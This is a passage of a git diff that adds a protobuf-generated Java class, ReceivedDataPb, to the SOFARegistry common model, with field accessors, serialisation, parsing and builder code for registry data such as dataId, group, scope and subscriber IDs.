"ConfiguratorRegistIds", "DataBox", "Version", + }); + com.alipay.sofa.registry.common.model.client.pb.DataBoxPbOuterClass.getDescriptor(); + } + + // @@protoc_insertion_point(outer_class_scope) +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/ReceivedDataPb.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/ReceivedDataPb.java new file mode 100644 index 000000000..7b6123f51 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/ReceivedDataPb.java @@ -0,0 +1,1501 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +/** Protobuf type {@code ReceivedDataPb} */ +public final class ReceivedDataPb extends com.google.protobuf.GeneratedMessageV3 + implements + // @@protoc_insertion_point(message_implements:ReceivedDataPb) + ReceivedDataPbOrBuilder { + private static final long serialVersionUID = 0L; + // Use ReceivedDataPb.newBuilder() to construct. + private ReceivedDataPb(com.google.protobuf.GeneratedMessageV3.Builder builder) { + super(builder); + } + + private ReceivedDataPb() { + dataId_ = ""; + group_ = ""; + instanceId_ = ""; + segment_ = ""; + scope_ = ""; + subscriberRegistIds_ = com.google.protobuf.LazyStringArrayList.EMPTY; + version_ = 0L; + localZone_ = ""; + } + + @java.lang.Override + public final com.google.protobuf.UnknownFieldSet getUnknownFields() { + return this.unknownFields; + } + + private ReceivedDataPb( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + this(); + if (extensionRegistry == null) { + throw new java.lang.NullPointerException(); + } + int mutable_bitField0_ = 0; + com.google.protobuf.UnknownFieldSet.Builder unknownFields = + com.google.protobuf.UnknownFieldSet.newBuilder(); + try { + boolean done = false; + while (!done) { + int tag = input.readTag(); + switch (tag) { + case 0: + done = true; + break; + default: + { + if (!parseUnknownFieldProto3(input, unknownFields, extensionRegistry, tag)) { + done = true; + } + break; + } + case 10: + { + java.lang.String s = input.readStringRequireUtf8(); + + dataId_ = s; + break; + } + case 18: + { + java.lang.String s = input.readStringRequireUtf8(); + + group_ = s; + break; + } + case 26: + { + java.lang.String s = input.readStringRequireUtf8(); + + instanceId_ = s; + break; + } + case 34: + { + java.lang.String s = input.readStringRequireUtf8(); + + segment_ = s; + break; + } + case 42: + { + java.lang.String s = input.readStringRequireUtf8(); + + scope_ = s; + break; + } + case 50: + { + java.lang.String s = input.readStringRequireUtf8(); + if (!((mutable_bitField0_ & 0x00000020) == 0x00000020)) { + subscriberRegistIds_ = new com.google.protobuf.LazyStringArrayList(); + mutable_bitField0_ |= 0x00000020; + } + subscriberRegistIds_.add(s); + break; + } + case 58: + { + if (!((mutable_bitField0_ & 0x00000040) == 0x00000040)) { + data_ = + com.google.protobuf.MapField.newMapField(DataDefaultEntryHolder.defaultEntry); + mutable_bitField0_ |= 0x00000040; + } + com.google.protobuf.MapEntry< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb> + data__ = + input.readMessage( + DataDefaultEntryHolder.defaultEntry.getParserForType(), + extensionRegistry); + data_.getMutableMap().put(data__.getKey(), data__.getValue()); + break; + } + case 64: + { + version_ = input.readInt64(); + break; + } + case 74: + { + java.lang.String s = input.readStringRequireUtf8(); + + localZone_ = s; + break; + } + } + } + } catch (com.google.protobuf.InvalidProtocolBufferException e) { + throw e.setUnfinishedMessage(this); + } catch (java.io.IOException e) { + throw new com.google.protobuf.InvalidProtocolBufferException(e).setUnfinishedMessage(this); + } finally { + if (((mutable_bitField0_ & 0x00000020) == 0x00000020)) { + subscriberRegistIds_ = subscriberRegistIds_.getUnmodifiableView(); + } + this.unknownFields = unknownFields.build(); + makeExtensionsImmutable(); + } + } + + public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { + return com.alipay.sofa.registry.common.model.client.pb.ReceivedDataPbOuterClass + .internal_static_ReceivedDataPb_descriptor; + } + + @SuppressWarnings({"rawtypes"}) + protected com.google.protobuf.MapField internalGetMapField(int number) { + switch (number) { + case 7: + return internalGetData(); + default: + throw new RuntimeException("Invalid map field number: " + number); + } + } + + protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internalGetFieldAccessorTable() { + return com.alipay.sofa.registry.common.model.client.pb.ReceivedDataPbOuterClass + .internal_static_ReceivedDataPb_fieldAccessorTable + .ensureFieldAccessorsInitialized( + com.alipay.sofa.registry.common.model.client.pb.ReceivedDataPb.class, + com.alipay.sofa.registry.common.model.client.pb.ReceivedDataPb.Builder.class); + } + + private int bitField0_; + public static final int DATAID_FIELD_NUMBER = 1; + private volatile java.lang.Object dataId_; + /** string dataId = 1; */ + public java.lang.String getDataId() { + java.lang.Object ref = dataId_; + if (ref instanceof java.lang.String) { + return (java.lang.String) ref; + } else { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + dataId_ = s; + return s; + } + } + /** string dataId = 1; */ + public com.google.protobuf.ByteString getDataIdBytes() { + java.lang.Object ref = dataId_; + if (ref instanceof java.lang.String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + dataId_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + + public static final int GROUP_FIELD_NUMBER = 2; + private volatile java.lang.Object group_; + /** string group = 2; */ + public java.lang.String getGroup() { + java.lang.Object ref = group_; + if (ref instanceof java.lang.String) { + return (java.lang.String) ref; + } else { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + group_ = s; + return s; + } + } + /** string group = 2; */ + public com.google.protobuf.ByteString getGroupBytes() { + java.lang.Object ref = group_; + if (ref instanceof java.lang.String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + group_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + + public static final int INSTANCEID_FIELD_NUMBER = 3; + private volatile java.lang.Object instanceId_; + /** string instanceId = 3; */ + public java.lang.String getInstanceId() { + java.lang.Object ref = instanceId_; + if (ref instanceof java.lang.String) { + return (java.lang.String) ref; + } else { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + instanceId_ = s; + return s; + } + } + /** string instanceId = 3; */ + public com.google.protobuf.ByteString getInstanceIdBytes() { + java.lang.Object ref = instanceId_; + if (ref instanceof java.lang.String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + instanceId_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + + public static final int SEGMENT_FIELD_NUMBER = 4; + private volatile java.lang.Object segment_; + /** string segment = 4; */ + public java.lang.String getSegment() { + java.lang.Object ref = segment_; + if (ref instanceof java.lang.String) { + return (java.lang.String) ref; + } else { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + segment_ = s; + return s; + } + } + /** string segment = 4; */ + public com.google.protobuf.ByteString getSegmentBytes() { + java.lang.Object ref = segment_; + if (ref instanceof java.lang.String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + segment_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + + public static final int SCOPE_FIELD_NUMBER = 5; + private volatile java.lang.Object scope_; + /** string scope = 5; */ + public java.lang.String getScope() { + java.lang.Object ref = scope_; + if (ref instanceof java.lang.String) { + return (java.lang.String) ref; + } else { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + scope_ = s; + return s; + } + } + /** string scope = 5; */ + public com.google.protobuf.ByteString getScopeBytes() { + java.lang.Object ref = scope_; + if (ref instanceof java.lang.String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + scope_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + + public static final int SUBSCRIBERREGISTIDS_FIELD_NUMBER = 6; + private com.google.protobuf.LazyStringList subscriberRegistIds_; + /** repeated string subscriberRegistIds = 6; */ + public com.google.protobuf.ProtocolStringList getSubscriberRegistIdsList() { + return subscriberRegistIds_; + } + /** repeated string subscriberRegistIds = 6; */ + public int getSubscriberRegistIdsCount() { + return subscriberRegistIds_.size(); + } + /** repeated string subscriberRegistIds = 6; */ + public java.lang.String getSubscriberRegistIds(int index) { + return subscriberRegistIds_.get(index); + } + /** repeated string subscriberRegistIds = 6; */ + public com.google.protobuf.ByteString getSubscriberRegistIdsBytes(int index) { + return subscriberRegistIds_.getByteString(index); + } + + public static final int DATA_FIELD_NUMBER = 7; + + private static final class DataDefaultEntryHolder { + static final com.google.protobuf.MapEntry< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb> + defaultEntry = + com.google.protobuf.MapEntry + . + newDefaultInstance( + com.alipay.sofa.registry.common.model.client.pb.ReceivedDataPbOuterClass + .internal_static_ReceivedDataPb_DataEntry_descriptor, + com.google.protobuf.WireFormat.FieldType.STRING, + "", + com.google.protobuf.WireFormat.FieldType.MESSAGE, + com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb + .getDefaultInstance()); + } + + private com.google.protobuf.MapField< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb> + data_; + + private com.google.protobuf.MapField< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb> + internalGetData() { + if (data_ == null) { + return com.google.protobuf.MapField.emptyMapField(DataDefaultEntryHolder.defaultEntry); + } + return data_; + } + + public int getDataCount() { + return internalGetData().getMap().size(); + } + /** map<string, .DataBoxesPb> data = 7; */ + public boolean containsData(java.lang.String key) { + if (key == null) { + throw new java.lang.NullPointerException(); + } + return internalGetData().getMap().containsKey(key); + } + /** Use {@link #getDataMap()} instead. */ + @java.lang.Deprecated + public java.util.Map< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb> + getData() { + return getDataMap(); + } + /** map<string, .DataBoxesPb> data = 7; */ + public java.util.Map< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb> + getDataMap() { + return internalGetData().getMap(); + } + /** map<string, .DataBoxesPb> data = 7; */ + public com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb getDataOrDefault( + java.lang.String key, + com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb defaultValue) { + if (key == null) { + throw new java.lang.NullPointerException(); + } + java.util.Map + map = internalGetData().getMap(); + return map.containsKey(key) ? map.get(key) : defaultValue; + } + /** map<string, .DataBoxesPb> data = 7; */ + public com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb getDataOrThrow( + java.lang.String key) { + if (key == null) { + throw new java.lang.NullPointerException(); + } + java.util.Map + map = internalGetData().getMap(); + if (!map.containsKey(key)) { + throw new java.lang.IllegalArgumentException(); + } + return map.get(key); + } + + public static final int VERSION_FIELD_NUMBER = 8; + private long version_; + /** int64 version = 8; */ + public long getVersion() { + return version_; + } + + public static final int LOCALZONE_FIELD_NUMBER = 9; + private volatile java.lang.Object localZone_; + /** string localZone = 9; */ + public java.lang.String getLocalZone() { + java.lang.Object ref = localZone_; + if (ref instanceof java.lang.String) { + return (java.lang.String) ref; + } else { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + localZone_ = s; + return s; + } + } + /** string localZone = 9; */ + public com.google.protobuf.ByteString getLocalZoneBytes() { + java.lang.Object ref = localZone_; + if (ref instanceof java.lang.String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + localZone_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + + private byte memoizedIsInitialized = -1; + + public final boolean isInitialized() { + byte isInitialized = memoizedIsInitialized; + if (isInitialized == 1) return true; + if (isInitialized == 0) return false; + + memoizedIsInitialized = 1; + return true; + } + + public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { + if (!getDataIdBytes().isEmpty()) { + com.google.protobuf.GeneratedMessageV3.writeString(output, 1, dataId_); + } + if (!getGroupBytes().isEmpty()) { + com.google.protobuf.GeneratedMessageV3.writeString(output, 2, group_); + } + if (!getInstanceIdBytes().isEmpty()) { + com.google.protobuf.GeneratedMessageV3.writeString(output, 3, instanceId_); + } + if (!getSegmentBytes().isEmpty()) { + com.google.protobuf.GeneratedMessageV3.writeString(output, 4, segment_); + } + if (!getScopeBytes().isEmpty()) { + com.google.protobuf.GeneratedMessageV3.writeString(output, 5, scope_); + } + for (int i = 0; i < subscriberRegistIds_.size(); i++) { + com.google.protobuf.GeneratedMessageV3.writeString(output, 6, subscriberRegistIds_.getRaw(i)); + } + com.google.protobuf.GeneratedMessageV3.serializeStringMapTo( + output, internalGetData(), DataDefaultEntryHolder.defaultEntry, 7); + if (version_ != 0L) { + output.writeInt64(8, version_); + } + if (!getLocalZoneBytes().isEmpty()) { + com.google.protobuf.GeneratedMessageV3.writeString(output, 9, localZone_); + } + unknownFields.writeTo(output); + } + + public int getSerializedSize() { + int size = memoizedSize; + if (size != -1) return size; + + size = 0; + if (!getDataIdBytes().isEmpty()) { + size += com.google.protobuf.GeneratedMessageV3.computeStringSize(1, dataId_); + } + if (!getGroupBytes().isEmpty()) { + size += com.google.protobuf.GeneratedMessageV3.computeStringSize(2, group_); + } + if (!getInstanceIdBytes().isEmpty()) { + size += com.google.protobuf.GeneratedMessageV3.computeStringSize(3, instanceId_); + } + if (!getSegmentBytes().isEmpty()) { + size += com.google.protobuf.GeneratedMessageV3.computeStringSize(4, segment_); + } + if (!getScopeBytes().isEmpty()) { + size += com.google.protobuf.GeneratedMessageV3.computeStringSize(5, scope_); + } + { + int dataSize = 0; + for (int i = 0; i < subscriberRegistIds_.size(); i++) { + dataSize += computeStringSizeNoTag(subscriberRegistIds_.getRaw(i)); + } + size += dataSize; + size += 1 * getSubscriberRegistIdsList().size(); + } + for (java.util.Map.Entry< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb> + entry : internalGetData().getMap().entrySet()) { + com.google.protobuf.MapEntry< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb> + data__ = + DataDefaultEntryHolder.defaultEntry + .newBuilderForType() + .setKey(entry.getKey()) + .setValue(entry.getValue()) + .build(); + size += com.google.protobuf.CodedOutputStream.computeMessageSize(7, data__); + } + if (version_ != 0L) { + size += com.google.protobuf.CodedOutputStream.computeInt64Size(8, version_); + } + if (!getLocalZoneBytes().isEmpty()) { + size += com.google.protobuf.GeneratedMessageV3.computeStringSize(9, localZone_); + } + size += unknownFields.getSerializedSize(); + memoizedSize = size; + return size; + } + + @java.lang.Override + public boolean equals(final java.lang.Object obj) { + if (obj == this) { + return true; + } + if (!(obj instanceof com.alipay.sofa.registry.common.model.client.pb.ReceivedDataPb)) { + return super.equals(obj); + } + com.alipay.sofa.registry.common.model.client.pb.ReceivedDataPb other = + (com.alipay.sofa.registry.common.model.client.pb.ReceivedDataPb) obj; + + boolean result = true; + result = result && getDataId().equals(other.getDataId()); + result = result && getGroup().equals(other.getGroup()); + result = result && getInstanceId().equals(other.getInstanceId()); + result = result && getSegment().equals(other.getSegment()); + result = result && getScope().equals(other.getScope()); + result = result && getSubscriberRegistIdsList().equals(other.getSubscriberRegistIdsList()); + result = result && internalGetData().equals(other.internalGetData()); + result = result && (getVersion() == other.getVersion()); + result = result && getLocalZone().equals(other.getLocalZone()); + result = result && unknownFields.equals(other.unknownFields); + return result; + } + + @java.lang.Override + public int hashCode() { + if (memoizedHashCode != 0) { + return memoizedHashCode; + } + int hash = 41; + hash = (19 * hash) + getDescriptor().hashCode(); + hash = (37 * hash) + DATAID_FIELD_NUMBER; + hash = (53 * hash) + getDataId().hashCode(); + hash = (37 * hash) + GROUP_FIELD_NUMBER; + hash = (53 * hash) + getGroup().hashCode(); + hash = (37 * hash) + INSTANCEID_FIELD_NUMBER; + hash = (53 * hash) + getInstanceId().hashCode(); + hash = (37 * hash) + SEGMENT_FIELD_NUMBER; + hash = (53 * hash) + getSegment().hashCode(); + hash = (37 * hash) + SCOPE_FIELD_NUMBER; + hash = (53 * hash) + getScope().hashCode(); + if (getSubscriberRegistIdsCount() > 0) { + hash = (37 * hash) + SUBSCRIBERREGISTIDS_FIELD_NUMBER; + hash = (53 * hash) + getSubscriberRegistIdsList().hashCode(); + } + if (!internalGetData().getMap().isEmpty()) { + hash = (37 * hash) + DATA_FIELD_NUMBER; + hash = (53 * hash) + internalGetData().hashCode(); + } + hash = (37 * hash) + VERSION_FIELD_NUMBER; + hash = (53 * hash) + com.google.protobuf.Internal.hashLong(getVersion()); + hash = (37 * hash) + LOCALZONE_FIELD_NUMBER; + hash = (53 * hash) + getLocalZone().hashCode(); + hash = (29 * hash) + unknownFields.hashCode(); + memoizedHashCode = hash; + return hash; + } + + public static com.alipay.sofa.registry.common.model.client.pb.ReceivedDataPb parseFrom( + java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ReceivedDataPb parseFrom( + java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ReceivedDataPb parseFrom( + com.google.protobuf.ByteString data) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ReceivedDataPb parseFrom( + com.google.protobuf.ByteString data, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ReceivedDataPb parseFrom( + byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ReceivedDataPb parseFrom( + byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ReceivedDataPb parseFrom( + java.io.InputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ReceivedDataPb parseFrom( + java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException( + PARSER, input, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ReceivedDataPb parseDelimitedFrom( + java.io.InputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ReceivedDataPb parseDelimitedFrom( + java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( + PARSER, input, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ReceivedDataPb parseFrom( + com.google.protobuf.CodedInputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ReceivedDataPb parseFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException( + PARSER, input, extensionRegistry); + } + + public Builder newBuilderForType() { + return newBuilder(); + } + + public static Builder newBuilder() { + return DEFAULT_INSTANCE.toBuilder(); + } + + public static Builder newBuilder( + com.alipay.sofa.registry.common.model.client.pb.ReceivedDataPb prototype) { + return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); + } + + public Builder toBuilder() { + return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); + } + + @java.lang.Override + protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { + Builder builder = new Builder(parent); + return builder; + } + /** Protobuf type {@code ReceivedDataPb} */ + public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder + implements + // @@protoc_insertion_point(builder_implements:ReceivedDataPb) + com.alipay.sofa.registry.common.model.client.pb.ReceivedDataPbOrBuilder { + public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { + return com.alipay.sofa.registry.common.model.client.pb.ReceivedDataPbOuterClass + .internal_static_ReceivedDataPb_descriptor; + } + + @SuppressWarnings({"rawtypes"}) + protected com.google.protobuf.MapField internalGetMapField(int number) { + switch (number) { + case 7: + return internalGetData(); + default: + throw new RuntimeException("Invalid map field number: " + number); + } + } + + @SuppressWarnings({"rawtypes"}) + protected com.google.protobuf.MapField internalGetMutableMapField(int number) { + switch (number) { + case 7: + return internalGetMutableData(); + default: + throw new RuntimeException("Invalid map field number: " + number); + } + } + + protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internalGetFieldAccessorTable() { + return com.alipay.sofa.registry.common.model.client.pb.ReceivedDataPbOuterClass + .internal_static_ReceivedDataPb_fieldAccessorTable + .ensureFieldAccessorsInitialized( + com.alipay.sofa.registry.common.model.client.pb.ReceivedDataPb.class, + com.alipay.sofa.registry.common.model.client.pb.ReceivedDataPb.Builder.class); + } + + // Construct using com.alipay.sofa.registry.common.model.client.pb.ReceivedDataPb.newBuilder() + private Builder() { + maybeForceBuilderInitialization(); + } + + private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { + super(parent); + maybeForceBuilderInitialization(); + } + + private void maybeForceBuilderInitialization() { + if (com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders) {} + } + + public Builder clear() { + super.clear(); + dataId_ = ""; + + group_ = ""; + + instanceId_ = ""; + + segment_ = ""; + + scope_ = ""; + + subscriberRegistIds_ = com.google.protobuf.LazyStringArrayList.EMPTY; + bitField0_ = (bitField0_ & ~0x00000020); + internalGetMutableData().clear(); + version_ = 0L; + + localZone_ = ""; + + return this; + } + + public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { + return com.alipay.sofa.registry.common.model.client.pb.ReceivedDataPbOuterClass + .internal_static_ReceivedDataPb_descriptor; + } + + public com.alipay.sofa.registry.common.model.client.pb.ReceivedDataPb + getDefaultInstanceForType() { + return com.alipay.sofa.registry.common.model.client.pb.ReceivedDataPb.getDefaultInstance(); + } + + public com.alipay.sofa.registry.common.model.client.pb.ReceivedDataPb build() { + com.alipay.sofa.registry.common.model.client.pb.ReceivedDataPb result = buildPartial(); + if (!result.isInitialized()) { + throw newUninitializedMessageException(result); + } + return result; + } + + public com.alipay.sofa.registry.common.model.client.pb.ReceivedDataPb buildPartial() { + com.alipay.sofa.registry.common.model.client.pb.ReceivedDataPb result = + new com.alipay.sofa.registry.common.model.client.pb.ReceivedDataPb(this); + int from_bitField0_ = bitField0_; + int to_bitField0_ = 0; + result.dataId_ = dataId_; + result.group_ = group_; + result.instanceId_ = instanceId_; + result.segment_ = segment_; + result.scope_ = scope_; + if (((bitField0_ & 0x00000020) == 0x00000020)) { + subscriberRegistIds_ = subscriberRegistIds_.getUnmodifiableView(); + bitField0_ = (bitField0_ & ~0x00000020); + } + result.subscriberRegistIds_ = subscriberRegistIds_; + result.data_ = internalGetData(); + result.data_.makeImmutable(); + result.version_ = version_; + result.localZone_ = localZone_; + result.bitField0_ = to_bitField0_; + onBuilt(); + return result; + } + + public Builder clone() { + return (Builder) super.clone(); + } + + public Builder setField( + com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { + return (Builder) super.setField(field, value); + } + + public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { + return (Builder) super.clearField(field); + } + + public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { + return (Builder) super.clearOneof(oneof); + } + + public Builder setRepeatedField( + com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { + return (Builder) super.setRepeatedField(field, index, value); + } + + public Builder addRepeatedField( + com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { + return (Builder) super.addRepeatedField(field, value); + } + + public Builder mergeFrom(com.google.protobuf.Message other) { + if (other instanceof com.alipay.sofa.registry.common.model.client.pb.ReceivedDataPb) { + return mergeFrom((com.alipay.sofa.registry.common.model.client.pb.ReceivedDataPb) other); + } else { + super.mergeFrom(other); + return this; + } + } + + public Builder mergeFrom(com.alipay.sofa.registry.common.model.client.pb.ReceivedDataPb other) { + if (other + == com.alipay.sofa.registry.common.model.client.pb.ReceivedDataPb.getDefaultInstance()) + return this; + if (!other.getDataId().isEmpty()) { + dataId_ = other.dataId_; + onChanged(); + } + if (!other.getGroup().isEmpty()) { + group_ = other.group_; + onChanged(); + } + if (!other.getInstanceId().isEmpty()) { + instanceId_ = other.instanceId_; + onChanged(); + } + if (!other.getSegment().isEmpty()) { + segment_ = other.segment_; + onChanged(); + } + if (!other.getScope().isEmpty()) { + scope_ = other.scope_; + onChanged(); + } + if (!other.subscriberRegistIds_.isEmpty()) { + if (subscriberRegistIds_.isEmpty()) { + subscriberRegistIds_ = other.subscriberRegistIds_; + bitField0_ = (bitField0_ & ~0x00000020); + } else { + ensureSubscriberRegistIdsIsMutable(); + subscriberRegistIds_.addAll(other.subscriberRegistIds_); + } + onChanged(); + } + internalGetMutableData().mergeFrom(other.internalGetData()); + if (other.getVersion() != 0L) { + setVersion(other.getVersion()); + } + if (!other.getLocalZone().isEmpty()) { + localZone_ = other.localZone_; + onChanged(); + } + this.mergeUnknownFields(other.unknownFields); + onChanged(); + return this; + } + + public final boolean isInitialized() { + return true; + } + + public Builder mergeFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + com.alipay.sofa.registry.common.model.client.pb.ReceivedDataPb parsedMessage = null; + try { + parsedMessage = PARSER.parsePartialFrom(input, extensionRegistry); + } catch (com.google.protobuf.InvalidProtocolBufferException e) { + parsedMessage = + (com.alipay.sofa.registry.common.model.client.pb.ReceivedDataPb) + e.getUnfinishedMessage(); + throw e.unwrapIOException(); + } finally { + if (parsedMessage != null) { + mergeFrom(parsedMessage); + } + } + return this; + } + + private int bitField0_; + + private java.lang.Object dataId_ = ""; + /** string dataId = 1; */ + public java.lang.String getDataId() { + java.lang.Object ref = dataId_; + if (!(ref instanceof java.lang.String)) { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + dataId_ = s; + return s; + } else { + return (java.lang.String) ref; + } + } + /** string dataId = 1; */ + public com.google.protobuf.ByteString getDataIdBytes() { + java.lang.Object ref = dataId_; + if (ref instanceof String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + dataId_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + /** string dataId = 1; */ + public Builder setDataId(java.lang.String value) { + if (value == null) { + throw new NullPointerException(); + } + + dataId_ = value; + onChanged(); + return this; + } + /** string dataId = 1; */ + public Builder clearDataId() { + + dataId_ = getDefaultInstance().getDataId(); + onChanged(); + return this; + } + /** string dataId = 1; */ + public Builder setDataIdBytes(com.google.protobuf.ByteString value) { + if (value == null) { + throw new NullPointerException(); + } + checkByteStringIsUtf8(value); + + dataId_ = value; + onChanged(); + return this; + } + + private java.lang.Object group_ = ""; + /** string group = 2; */ + public java.lang.String getGroup() { + java.lang.Object ref = group_; + if (!(ref instanceof java.lang.String)) { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + group_ = s; + return s; + } else { + return (java.lang.String) ref; + } + } + /** string group = 2; */ + public com.google.protobuf.ByteString getGroupBytes() { + java.lang.Object ref = group_; + if (ref instanceof String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + group_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + /** string group = 2; */ + public Builder setGroup(java.lang.String value) { + if (value == null) { + throw new NullPointerException(); + } + + group_ = value; + onChanged(); + return this; + } + /** string group = 2; */ + public Builder clearGroup() { + + group_ = getDefaultInstance().getGroup(); + onChanged(); + return this; + } + /** string group = 2; */ + public Builder setGroupBytes(com.google.protobuf.ByteString value) { + if (value == null) { + throw new NullPointerException(); + } + checkByteStringIsUtf8(value); + + group_ = value; + onChanged(); + return this; + } + + private java.lang.Object instanceId_ = ""; + /** string instanceId = 3; */ + public java.lang.String getInstanceId() { + java.lang.Object ref = instanceId_; + if (!(ref instanceof java.lang.String)) { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + instanceId_ = s; + return s; + } else { + return (java.lang.String) ref; + } + } + /** string instanceId = 3; */ + public 